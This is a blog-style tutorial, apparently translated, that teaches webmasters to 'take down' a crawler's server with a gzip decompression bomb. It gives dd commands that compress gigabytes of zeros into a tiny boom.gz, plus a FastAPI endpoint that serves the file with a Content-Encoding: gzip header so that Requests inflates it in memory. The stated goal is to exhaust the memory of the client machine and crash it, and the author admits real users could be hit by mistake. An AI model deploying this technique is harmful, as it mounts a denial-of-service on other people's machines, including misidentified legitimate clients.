One skill a day: the ultimate anti-crawler trick, a few lines of code to take down a crawler's server

As a webmaster, are you bothered by crawlers? They hit your site every day, fast and frequently, and waste a lot of your server's resources.

Lucky you for reading this article: today we take revenge on the crawler and go straight for its server.

This article has one premise: you already know for certain that a request comes from a crawler, and simply blocking it is not enough for you; you want to take the crawler down.

Many people write their crawlers with Requests. If you have read the Requests documentation, you may have noticed this sentence in the Binary Response Content[1] section:

The gzip and deflate transfer-encodings are automatically decoded for you. In other words, Requests automatically decompresses response bodies that were compressed with gzip or deflate.

A web server may compress large resources with gzip, so they are transmitted over the network as compressed binary data. When the client receives the response and finds a Content-Encoding field in the response headers whose value contains gzip, it first decompresses the data with gzip and only then presents it. The browser does this automatically, and the user is unaware that it is happening. Network libraries and crawler frameworks such as requests and Scrapy do the same for you, so you never need to decompress the returned data manually.
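
What this transparent decoding amounts to can be illustrated with a minimal sketch using Python's standard gzip module (this is an illustration of the idea, not the actual internals of Requests):

import gzip

# The bytes on the wire are compressed; the library inflates them before
# handing them to you as resp.content / resp.text.
compressed = gzip.compress(b'hello from the server')  # what travels over the network
original = gzip.decompress(compressed)                # what the client ends up holding
print(len(compressed), len(original))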

This behavior was designed as a convenience for developers, but we can use it to strike back at crawlers.

Let's first put together a small example to test returning gzip-compressed data.

First, I create a text file text.txt on the disk with two lines of text in it.

Then, I compress it into a .gz file using the gzip command:

cat text.txt | gzip > data.gz

Next, we write an HTTP server, server.py, using FastAPI:

from fastapi import FastAPI, Response
from fastapi.responses import FileResponse


app = FastAPI()


@app.get('/')
def index():
    resp = FileResponse('data.gz')
    return resp

Then start the service with the command uvicorn server:app.

Next, we request this interface with requests, and we find that the returned data is garbled.

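For reference, the client side is just an ordinary requests call (a sketch assuming uvicorn's default address of 127.0.0.1:8000):

import requests

resp = requests.get('http://127.0.0.1:8000/')
print(resp.text[:100])  # raw gzip bytes decoded as text: unreadable gibberish
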
The data is garbled because the server never told the client that it is gzip-compressed, so the client shows it as-is. Since the compressed data is binary, forcing it into a string produces gibberish.

Now let's slightly modify server.py so that the response headers tell the client that this data is gzip-compressed:

from fastapi import FastAPI, Response
from fastapi.responses import FileResponse


app = FastAPI()


@app.get('/')
def index():
    resp = FileResponse('data.gz')
    resp.headers['Content-Encoding'] = 'gzip'  # tell the client this data is gzip-compressed
    return resp

After the change, restart the server and send the same requests call again; this time the data displays normally.

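The same client sketch now prints readable text, because requests sees the Content-Encoding: gzip header and decompresses the body before handing it to us (again assuming 127.0.0.1:8000):

import requests

resp = requests.get('http://127.0.0.1:8000/')
print(resp.headers.get('Content-Encoding'))  # 'gzip'
print(resp.text)                             # the original contents of text.txt
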
Now that we have seen this behavior in action, how do we exploit it? To answer that, we need to talk about how file compression works.

Files can be compressed because they contain many repeated elements that can be expressed more compactly. There are many compression algorithms; let's illustrate one of the simplest ideas with an example. Suppose we have a string that looks like this:

1111111111111111
1111111111111111
1111111111111111
1111111111111111
1111111111111111
1111111111111111
1111111111111111
1111111111111111
1111111111111111
1111111111111111
1111111111111111
1111111111111111

We can describe it with just five characters, "192x1", meaning 192 copies of the digit 1. That compresses 192 characters into 5, a compression rate of about 97.4%.
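
gzip's DEFLATE algorithm is more sophisticated than this run-length idea, but the effect on highly repetitive data is similar. A quick sketch you can run in any Python shell (the exact compressed size may vary slightly between Python versions):

import gzip

data = b'1' * 1_000_000     # one million identical bytes
packed = gzip.compress(data)
print(len(packed))          # roughly a kilobyte: repetitive data compresses extremely well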

If we can compress a 1 GB file into 1 MB, then the server only has to send 1 MB of binary data, which costs it almost nothing. But when the client or crawler receives that 1 MB, it inflates it back into 1 GB of content in memory, and in that instant the crawler's memory usage jumps by 1 GB. If we make the original data even larger, it is easy to exhaust the memory of the machine running the crawler: in the mild case, the operating system kills the crawler process; in the severe case, the crawler's server crashes outright.

If this compression ratio sounds exaggerated, it isn't: we can generate such a compressed file with a single, very simple command.

If you are using Linux, then execute the command:

dd if=/dev/zero bs=1M count=1000 | gzip > boom.gz

If your computer is macOS, then execute the command:

dd if=/dev/zero bs=1048576 count=1000 | gzip > boom.gz
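
If you prefer not to depend on dd, a cross-platform Python sketch produces an equivalent file (the file name and sizes here simply mirror the command above):

import gzip

# Stream ~1 GB of zero bytes through gzip without holding them all in memory.
chunk = b'\x00' * (1024 * 1024)    # 1 MB of zeros per write
with gzip.open('boom.gz', 'wb') as f:
    for _ in range(1000):          # 1000 chunks, i.e. about 1 GB uncompressed
        f.write(chunk)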

The resulting boom.gz file is only about 995 KB. But if we decompress it with gzip -d boom.gz, we get a 1 GB file named boom.

To get an even larger file, simply change count=1000 in the command to a larger number.

For the demo below I change count to 10 (I dare not test with 1 GB of data, for fear of crashing my own Jupyter). The resulting boom.gz file is only about 10 KB.

The server can return this 10 KB of binary data without any trouble.
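
Putting the pieces together, the endpoint only needs to serve boom.gz instead of data.gz. A sketch following the same pattern as the server above:

from fastapi import FastAPI
from fastapi.responses import FileResponse


app = FastAPI()


@app.get('/')
def index():
    # Serve the pre-compressed bomb and declare it as ordinary gzip-encoded
    # content, so a well-behaved client will decompress it automatically.
    resp = FileResponse('boom.gz')
    resp.headers['Content-Encoding'] = 'gzip'
    return resp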

Now we request this interface with requests and check how much memory the resp object takes up.

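A rough way to check this from a Python shell (assuming 127.0.0.1:8000 again; the exact figure will vary slightly):

import requests

resp = requests.get('http://127.0.0.1:8000/')
# requests has already decompressed the body, so this length reflects the
# uncompressed size rather than the ~10 KB that travelled over the network.
print(len(resp.content) / 1024 / 1024, 'MB')
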
Because requests automatically decompresses the returned data, the resulting resp object ends up being about 10 MB.

If you want to use this method, you must first make absolutely sure that the request really comes from a crawler, and only then apply it. Otherwise it will be your real users, not the crawlers, whose machines you take down, and that would be real trouble.
